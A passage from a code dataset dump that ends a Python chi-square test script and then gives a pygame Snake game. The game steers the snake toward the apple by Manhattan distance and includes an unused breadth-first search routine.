alpha=alpha, Ha=Ha))\r\n\r\n\t# If p<=alpha, reject Ho. Hence, there is a relation between the two categorical variables\r\n\t# else, retain Ho. Hence, there is no relation between the two categorical variables\r\n\r\n\tHnull = 'There is no relation between the categorical variables'\r\n\tHalt = 'There is a relation between the categorical variables'\r\n\t# Computing the critical value\r\n\tcritical = stats.chi2.ppf(q=1-alpha, df=dof)\r\n\r\n\tprint('\\n'+\"Inference from Critical Value\")\r\n\r\n\tif critical>stat:\r\n\t\tprint(\"{critical} is greater than {stat}. We fail to reject the Null Hypothesis. {Hnull}\".format(critical=round(critical,2), stat=round(stat, 2), Hnull=Hnull))\r\n\telse:\r\n\t\tprint(\"{critical} is less than {stat}. We reject the Null Hypothesis. {Halt}\".format(critical=round(critical,2), stat=round(stat, 2), Halt=Halt))\r\n\r\n\t# If critical<=stat, reject Ho. Hence, there is a relation between the two categorical variables\r\n\t# else, retain Ho. 
Hence, there is no relation between the two categorical variables\r\n\r\nchi_square(CustOrderForm)","sub_path":"Customer+OrderForm.py","file_name":"Customer+OrderForm.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"128176119","text":"#!/usr/bin/env python\r\nfrom queue import Queue\r\nimport pygame\r\nimport sys\r\nimport time\r\nimport random\r\n\r\n\r\n# Step sizes for the four BFS neighbours on the 10px grid\r\ndx = [0,0,-10,10]\r\ndy = [10,-10,0,0]\r\n\r\nfrom pygame.locals import *\r\n\r\nFPS = 50\r\npygame.init()\r\nfpsClock = pygame.time.Clock()\r\n\r\nSCREEN_WIDTH, SCREEN_HEIGHT = 640, 480\r\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT), 0, 32)\r\nsurface = pygame.Surface(screen.get_size())\r\nsurface = surface.convert()\r\nsurface.fill((255,255,255))\r\nclock = pygame.time.Clock()\r\n\r\npygame.key.set_repeat(1, 40)\r\n\r\nGRIDSIZE = 10\r\nGRID_WIDTH = SCREEN_WIDTH // GRIDSIZE\t# integer division keeps grid counts ints\r\nGRID_HEIGHT = SCREEN_HEIGHT // GRIDSIZE\r\nUP = (0, -1)\r\nDOWN = (0, 1)\r\nLEFT = (-1, 0)\r\nRIGHT = (1, 0)\r\n\r\nscreen.blit(surface, (0,0))\r\n\r\ndef draw_box(surf, color, pos):\r\n r = pygame.Rect((pos[0], pos[1]), (GRIDSIZE, GRIDSIZE))\r\n pygame.draw.rect(surf, color, r)\r\n\r\n\r\nclass Snake(object):\r\n def __init__(self):\r\n self.lose()\r\n self.color = (0,0,0)\r\n\r\n def get_head_position(self):\r\n return self.positions[0]\r\n\r\n def lose(self):\r\n self.length = 1\r\n self.positions = [(SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2)]\r\n self.direction = random.choice([UP, DOWN, LEFT, RIGHT])\r\n\r\n def point(self, pt):\r\n if self.length > 1 and (pt[0] * -1, pt[1] * -1) == self.direction:\r\n return\r\n else:\r\n self.direction = pt\r\n #def buscaApple(self, Apple_position):\r\n\r\n def move(self):\r\n cur = self.positions[0]\r\n x, y = self.direction\r\n new = (((cur[0]+(x*GRIDSIZE)) % SCREEN_WIDTH), (cur[1]+(y*GRIDSIZE)) % SCREEN_HEIGHT)\r\n if len(self.positions) > 2 and new in self.positions[2:]:\r\n self.lose()\r\n else:\r\n self.positions.insert(0, new)\r\n if len(self.positions) > self.length:\r\n self.positions.pop()\r\n \r\n def draw(self, surf):\r\n for p in self.positions:\r\n draw_box(surf, self.color, p)\r\n\r\nclass Apple(object):\r\n def __init__(self):\r\n self.position = (0,0)\r\n self.color = (255,0,0)\r\n self.randomize()\r\n\r\n def randomize(self):\r\n self.position = (random.randint(0, GRID_WIDTH-1) * GRIDSIZE, random.randint(0, GRID_HEIGHT-1) * GRIDSIZE)\r\n\r\n def draw(self, surf):\r\n draw_box(surf, self.color, self.position)\r\n\r\ndef check_eat(snake, apple):\r\n if snake.get_head_position() == apple.position:\r\n snake.length += 1\r\n apple.randomize()\r\n \r\ndef bfs(snake, apple):\r\n fila = Queue()\t# FIFO frontier for the BFS ('fila' = queue)\r\n \r\n s1 = snake.positions[0][0]\r\n s2 = snake.positions[0][1]\r\n \r\n fila.put((s1,s2))\r\n \r\n visited = []\r\n pai = []\t# 'pai' (parent) maps each cell to its BFS predecessor\r\n \r\n for i in range(642):\r\n visited.append([0])\r\n pai.append([0])\r\n for j in range(482):\r\n visited[i].append(0)\r\n pai[i].append(())\r\n \r\n pai[s1][s2] = (-1,-1)\r\n \r\n while(not fila.empty()):\r\n topo = fila.get()\r\n \r\n v = topo[0]\r\n u = topo[1]\r\n \r\n if(visited[v][u]): continue\r\n \r\n visited[v][u] = 1\r\n \r\n for i in range(4):\r\n xx = v + dx[i]\r\n yy = u + dy[i]\r\n if(xx >= 0 and xx <= 640 and yy >= 0 and yy <= 480 and (xx,yy) not in snake.positions and not visited[xx][yy]):\r\n fila.put((xx,yy))\r\n pai[xx][yy] = (v,u)\r\n \r\n a1 = apple.position[0]\r\n a2 = apple.position[1]\r\n cont = 0\r\n \r\n print(\"The snake is at %d 
%d\" %(s1,s2))\r\n print(\"A maca esta em %d %d\"%(a1,a2))\r\n\r\n while(True):\r\n \r\n if(a1 == -1 and a2 == -1): break\r\n \r\n print(str(a1) + \" \" + str(a2))\r\n aux = pai[a1][a2]\r\n cont += 1\r\n if cont > 100: break\r\n a1 = aux[0]\r\n a2 = aux[1]\r\n \r\n \r\n\r\nif __name__ == '__main__':\r\n snake = Snake()\r\n apple = Apple()\r\n while True:\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n elif event.type == KEYDOWN:\r\n if event.key == K_UP:\r\n snake.point(UP)\r\n elif event.key == K_DOWN:\r\n snake.point(DOWN)\r\n elif event.key == K_LEFT:\r\n snake.point(LEFT)\r\n elif event.key == K_RIGHT:\r\n snake.point(RIGHT)\r\n\r\n # bfs(snake,apple)\r\n surface.fill((255,255,255))\r\n # snake.buscaApple(apple.position)\r\n \r\n x1 = snake.positions[0][0]/10\r\n y1 = snake.positions[0][1]/10\r\n x2 = apple.position[0]/10\r\n y2 = apple.position[1]/10\r\n \r\n # print(str(x1) + \" \" + str(y1))\r\n # print(str(x2) + \" \" + str(y2))\r\n \r\n xx = x1 - x2\r\n yy = y1 - y2\r\n \r\n print(xx)\r\n print(yy)\r\n \r\n left = False\r\n up = False\r\n \r\n if yy > 0:\r\n up = True\r\n \r\n if xx > 0:\r\n left = True\r\n \r\n \r\n for i in range(abs(int(xx))):\r\n if left:\r\n snake.point(LEFT)\r\n \r\n else:\r\n snake.point(RIGHT)\r\n surface.fill((255,255,255))\r\n snake.move()\r\n check_eat(snake, apple)\r\n snake.draw(surface)\r\n apple.draw(surface)\r\n font = pygame.font.Font(None, 36)\r\n text = font.render(str(snake.length), 1, (10, 10, 10))\r\n textpos = text.get_rect()\r\n textpos.centerx = 20\r\n surface.blit(text, textpos)\r\n screen.blit(surface, (0,0))\r\n\r\n pygame.display.flip()\r\n pygame.display.update()\r\n fpsClock.tick(FPS + snake.length/3)\r\n \r\n for i in range(abs(int(yy))):\r\n if up:\r\n snake.point(UP)\r\n else:\r\n snake.point(DOWN)\r\n surface.fill((255,255,255))\r\n snake.move()\r\n check_eat(snake, apple)\r\n snake.draw(surface)\r\n apple.draw(surface)\r\n font = pygame.font.Font(None, 36)\r\n text = font.render(str(snake.length), 1, (10, 10, 10))\r\n textpos = text.get_rect()\r\n textpos.centerx = 20\r\n surface.blit(text, textpos)\r\n screen.blit(surface, (0,0))\r\n\r\n pygame.display.flip()\r\n pygame.display.update()\r\n fpsClock.tick(FPS + snake.length/3)\r\n \r\n ","sub_path":"Pygame/snakemanhattan.py","file_name":"snakemanhattan.py","file_ext":"py","file_size_in_byte":6513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}